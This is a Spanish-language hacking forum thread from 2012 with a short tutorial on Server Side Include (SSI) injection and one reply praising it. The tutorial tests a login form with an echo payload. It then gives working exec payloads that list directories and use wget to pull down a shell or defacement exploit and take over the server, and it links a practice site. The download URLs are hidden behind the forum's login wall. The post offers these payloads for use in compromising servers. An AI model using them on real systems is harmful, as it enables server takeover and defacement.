(Server Side Include) SSI Inyección

  • 1 Respuestas
  • 2406 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado xc0d3

  • *
  • Underc0der
  • Mensajes: 37
  • Actividad:
    0%
  • Reputación 0
  • [email protected][#] ~Done
    • Ver Perfil
    • Email

(Server Side Include) SSI Inyección

  • en: Junio 22, 2012, 01:19:57 pm

(Server Side Include) es una técnica de explotación de servidor que permite a un atacante enviar código a una aplicación web, que posteriormente será ejecutado localmente por el servidor web. el ataque permite la explotación de una aplicación web mediante la inyección de secuencias de comandos en páginas HTML o ejecutar códigos arbitrarios de forma remota .

Para este ejemplo he utilizado el comando <! - # echo var = "DATE_LOCAL" -> . Aquí hay un formulario de acceso en blanco Ahora, después de que me inyecto <! - # echo var = "DATE_LOCAL" -> en el nombre de usuario y contraseña de campo, esta salida es lo que asegura la página es vulnerable a la SSI, conforme se ejecuta el comando que he presentado en la presentación del formulario. Aquí está la salida. Ahora, yo no voy a aprovechar este servidor (no creo en la piratería sin razón), pero ahora sabiendo que el servidor es vulnerable a la SSI, que puede ejecutar un comando para subir una Shell y luego tomar el control del servidor. Comando: <! - # exec cmd = "wget You are not allowed to view links. Register or Login "->



<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>

este comando nos permite ver los directorios




You are not allowed to view links. Register or Login

con este comando nos permitirá enviar nuestra shell o exploit deface etc.

<!--#exec cmd="wget You are not allowed to view links. Register or Login" -->

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login

You are not allowed to view links. Register or Login WEB PARA QUE PRACTIQUEN =D

 
« Última modificación: Junio 22, 2012, 01:24:01 pm por xc0d3 »
Tengo una pregunta que a veces me tortura "estoy loco yo o los locos son los demás”

Desconectado arthusu

  • *
  • Ex-Staff
  • *****
  • Mensajes: 555
  • Actividad:
    0%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
  • Skype: arthusuxD
    • Ver Perfil
    • Arthusu BLOG

Re:(Server Side Include) SSI Inyección

  • en: Julio 11, 2012, 12:02:00 am
Excelente tutorial man :D
Pentest - Hacking & Security Services

Contact me: [email protected]